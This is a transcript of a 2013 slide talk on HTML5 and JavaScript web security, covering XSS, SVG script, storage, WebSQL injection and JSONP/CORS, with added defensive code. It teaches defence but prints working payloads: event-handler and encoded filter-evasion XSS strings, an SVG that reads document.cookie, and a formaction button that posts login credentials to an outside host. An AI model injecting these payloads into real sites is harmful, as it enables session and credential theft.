2013 05-03 -  HTML5 & JavaScript Security
 


INTERACTIVE SLIDES:
http://johanneshoppe.github.com/HTML5Security/

You know the well-known attack vectors such as SQL injection or XSS. Your application is secure. Is it really? Even if you do not use HTML5 in your web application, the browsers are ready! Do you know all the new markup? Do you already have the potential of cross-origin requests, WebSockets or local storage on your radar? Get to know the new sources of danger that have arisen through support for HTML5 and its APIs.

Presentation Transcript

    • Security. Created by Johannes Hoppe
    • Goal: point out attack vectors, discuss strategies. Nothing more!
    • Features: new attack vectors
    • A form
      <form id="login" action="#">
        Username: <input type="text" name="username">
        Password: <input type="password" name="password">
        <input type="submit" value="Login">
      </form>
    • formaction
      <form id="login" action="#">
        Username: <input type="text" name="username">
        Password: <input type="password" name="password">
        <input type="submit" value="Login">
      </form>
      <button type="submit" form="login" formaction="http://example.org">Click me!</button>
      The button sits outside the form: the HTML5 form attribute associates it with the login form and formaction overrides the form's action, so one click posts the username and password to http://example.org. Injected markup anywhere on the page is enough.
    • SVG: Presto, WebKit, Gecko and even Trident 9
      <?xml version="1.0"?>
      <svg xmlns="http://www.w3.org/2000/svg" width="40" height="40">
        <circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/>
        <circle cx="15" cy="15" r="2" fill="black" stroke="black"/>
        <circle cx="25" cy="15" r="2" fill="black" stroke="black"/>
        <path d="M 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke-width="2"/>
      </svg>
    • SVG can contain JavaScript!
      <?xml version="1.0"?>
      <svg xmlns="http://www.w3.org/2000/svg" width="200" height="50">
        <defs>
          <style><![CDATA[ text { font-size:6pt; } ]]></style>
        </defs>
        <circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/>
        <circle cx="15" cy="15" r="2" fill="black" stroke="black"/>
        <circle cx="25" cy="15" r="2" fill="black" stroke="black"/>
        <path d="M 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke-width="2" transform="rotate(180, 20, 28)"/>
        <text x="11" y="50" id="display">Test</text>
        <script>
          alert(document.cookie);
          document.getElementById('display').textContent = document.cookie;
        </script>
      </svg>
    • Business as usual: HTML5 is no worse than HTML 4 » http://html5sec.org
    • XSS: injected JavaScript code
    • Oldies but goldies
      index.html?message=Data saved
      index.html?message=<script>alert('XSS')</script>

      <script>
        var message = $.url().param('message');
        if (message) {
          Notifier.success(message);
        }
      </script>
    • Eval everywhere. Eval is evil » Demo
      <!-- Self-executing onFocus event via autoFocus -->
      <input onfocus="alert('XSS onfocus')" autofocus>
      <!-- Video OnError -->
      <video><source onerror="javascript:alert('XSS onerror')"></video>
      <!-- Presto only: Form surveillance -->
      <form id=test onforminput=alert('XSS onforminput')><input></form>
      <button form=test onformchange=alert('XSS onformchange')>X</button>
    • OWASP (Open Web Application Security Project), XSS Filter Evasion Cheat Sheet
      <!-- Long UTF-8 Unicode encoding without semicolons -->
      <IMG SRC="&#34&#32&#111&#110&#101&#114&#114&#111&#114&#61&#34&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">
      » Old IE Demo
    • Preventing XSS
    • 1. Dynamic data must never be used here:
      <script> HERE </script>
      <!-- HERE -->
      <div HERE="test"/>
      <HERE href="test" />
      <style> HERE </style>
    • 2. HTML-escape dynamic data
      &  →  &amp;
      <  →  &lt;
      >  →  &gt;
      "  →  &quot;
      '  →  &apos; / &#39;
      <div>HTML ESCAPE</div>
    • Test?
      function htmlEncode(input) {
        // jquery.text == document.createTextNode
        return ($('<div/>').text(input).html());
      }

      var saveFormat = function () {
        var args = Array.prototype.slice.call(arguments);
        var txt = args.shift();
        $.each(args, function (i, item) {
          item = htmlEncode(item);
          txt = txt.replace("{" + i + "}", item);
        });
        return txt;
      };
    • Test!
      describe("saveFormat", function () {
        var original = '{0} - {1} - {2}';
        it("should replace placeholders", function () {
          var expected = 'A - B - C';
          var formated = saveFormat(original, 'A', 'B', 'C');
          expect(formated).toEqual(expected);
        });
        it("should encode injected content", function () {
          var expected = 'A - &lt;b&gt;TEST&lt;/b&gt; - C';
          var formated = saveFormat(original, 'A', '<b>TEST</b>', 'C');
          expect(formated).toEqual(expected);
        });
      });
    • Test: finished in 0.007s, no try/catch, Jasmine 1.3.1 revision 1354556913. Passing, 2 specs: saveFormat should replace placeholders; should encode injected content. » Demo
    • Wait a moment...
      describe("saveFormat", function () {
        var original = '<a title="{0}">Test</a>';
        it("should replace quotes", function () {
          var expected = '<a title="&quot;">Test</a>';
          var formated = saveFormat(original, '"');
          expect(formated).toEqual(expected);
        });
      });
    • Test properly! finished in 0.006s, no try/catch, Jasmine 1.3.1 revision 1354556913. Failing, 1 spec, 1 failing: saveFormat should replace quotes. Error: Expected <a title=""">Test</a> to equal <a title="&quot;">Test</a>. » Demo
      The .text().html() round trip serializes a text node, which encodes only &, < and >, so the quote passes through unchanged and terminates the attribute.
    • 3. Attribute-escape dynamic data: a-z A-Z 0-9 → immune; , . - _ → immune; everything else → &#xHH;
      <div attr="ATTRIBUTE ESCAPE"></div>
      <!-- NEVER without quotes! -->
      <div attr=ATTRIBUTE ESCAPE></div>
    • 4. DO NOT JavaScript-escape dynamic data. The HTML parser runs before the JavaScript parser! You are doing it wrong.
    • This is everyday reality. UserList.cshtml / Kendo UI template:
      # if(ID != 0) { #
      <a href="javascript:DialogManager.ShowPartialDialog('@Url.Action("UserManagement", "Management")', { userId : #= htmlEncode(ID) # }, { title: '#= htmlEncode(Alias) #' })">#= htmlEncode(Alias) #</a>
      # } else { #
      #= htmlEncode(Alias) #
      # } #
      htmlEncode() is applied to data that ends up inside a javascript: URL: the HTML parser decodes the entities before the JavaScript runs, so the value reaches the script unescaped.
    • ? Clearly something is fundamentally wrong with the way data is handled!
    • Storage
    • Whether cookies, session storage, local storage or WebSQL: the data is not trustworthy!
    • Resident XSS: really nasty!
    • Confidential information belongs in the SERVER session!
    • Prefer session storage!
    • WebSQL
      // SQL injection:
      executeSql("SELECT foo FROM bar WHERE value=" + value);
      // Prepared statement:
      executeSql("SELECT foo FROM bar WHERE value=?", [value]);
    • Communication
    • Mashups!
      define(['jquery', 'knockout', 'knockout.mapping', 'domReady!'], function ($, ko, mapping) {
        var url = 'http://search.twitter.com/search.json?q=%23xss&callback=?';
        $.getJSON(url).done(function (data) {
          var viewModel = mapping.fromJS(data);
          ko.applyBindings(viewModel, $('#tweets').get(0));
        });
      });
    • JSON / JSON with Padding
      JSON:
      {"hello": "world"}

      JSONP:
      <script>
        var foo = function (json) {
          $('#output').text(JSON.stringify(json, undefined, 2));
        };
      </script>
      <script src="http://search.twitter.com/search.json?q=%23dnc13&callback=foo"></script>

      The response is executed as script:
      foo({"hello": "world"});
      » Demo
    • JSONP
    • SOP: same-origin policy → necessity is the mother of invention (JSONP). CORS: Cross-Origin Resource Sharing → Access-Control-Allow-Origin: *. WebSockets: do what you want.
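      The JSONP and SOP/CORS slides above describe two ways of crossing the same-origin policy; the following is an added example, not code from the slides, showing how to do each without handing control to the other side: a JSONP body unwrapped as text and parsed as data instead of executed, and CORS headers decided from an allow-list instead of "*" or a reflected Origin. The origins, callback name and response bodies are constructed for the example.

```javascript
// Added example (not from the slides). Origins, callback name and bodies
// below are constructed assumptions.

// JSONP: <script src="...&callback=foo"> executes whatever the remote
// server returns, as your origin. If a JSONP-only endpoint must be read,
// fetch the body as text (via CORS or a server-side proxy) and unwrap the
// padding yourself, so the payload only ever meets JSON.parse.
function unwrapJsonp(body, callbackName) {
  if (!/^[A-Za-z_$][\w$]*$/.test(callbackName)) {
    throw new Error("invalid callback name");
  }
  // Some endpoints prefix "/**/" to defeat content sniffing; drop it, then
  // require exactly callbackName( ... ) with an optional trailing ";".
  const text = String(body).trim().replace(/^\/\*\*\/\s*/, "").replace(/;$/, "");
  const prefix = callbackName + "(";
  if (!text.startsWith(prefix) || !text.endsWith(")")) {
    throw new Error("body is not " + callbackName + "(...)");
  }
  // JSON.parse throws on anything that is not plain data, including a
  // second statement smuggled in after the padding.
  return JSON.parse(text.slice(prefix.length, -1));
}

// CORS: "Access-Control-Allow-Origin: *" lets every site read the response
// (browsers refuse "*" together with credentials, so it only fits data that
// is genuinely public). Reflecting the request's Origin header is worse
// once credentials are allowed: any site then reads the response as the
// logged-in user. Decide from an allow-list and send Vary: Origin so shared
// caches do not serve one origin's answer to another. The same check
// belongs in a WebSocket handshake: the browser sends Origin there but
// enforces nothing.
const ALLOWED_ORIGINS = new Set([
  "https://app.example",   // assumed first-party origins
  "https://admin.example",
]);

function corsHeadersFor(requestOrigin, allowed = ALLOWED_ORIGINS) {
  // "null" is what sandboxed iframes and file:// pages send; never allow it.
  if (!requestOrigin || requestOrigin === "null" || !allowed.has(requestOrigin)) {
    return null; // send no CORS headers at all; the browser blocks the read
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Constructed bodies for a quick run with node:
console.log(unwrapJsonp('/**/foo({"hello": "world"});', "foo"));
try {
  unwrapJsonp('foo({"hello":"world"});alert(document.cookie)', "foo");
} catch (e) {
  console.log("rejected smuggled script:", e.message);
}
console.log(corsHeadersFor("https://app.example"));
console.log(corsHeadersFor("https://evil.example"));
```

      The second constructed body is what a compromised or malicious JSONP server could return; loaded through a script tag it runs alert(document.cookie) in the page, while unwrapJsonp() rejects it because the text between the padding is not valid JSON.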
    • JS-Recon, Shell of the Future
    • Intranet == Internet
    • Thanks!
    • » Security of web applications